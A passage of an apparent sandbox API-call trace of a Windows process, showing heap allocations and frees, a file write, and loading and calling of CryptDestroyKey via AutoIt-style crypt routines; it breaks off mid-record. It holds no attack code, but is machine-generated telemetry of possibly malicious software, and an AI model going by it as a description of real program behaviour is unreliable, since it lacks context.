(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2f14818 [0238.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.016] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xd668, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xd668, lpOverlapped=0x0) returned 1 [0238.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0238.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0238.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0238.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.021] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0238.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0238.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f18 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0238.021] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0238.022] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0238.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0238.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0238.024] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.025] CryptDestroyKey (hKey=0xa87090) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.027] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.027] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0238.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.027] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0238.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.028] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0238.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0238.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.028] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0238.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0238.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0238.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 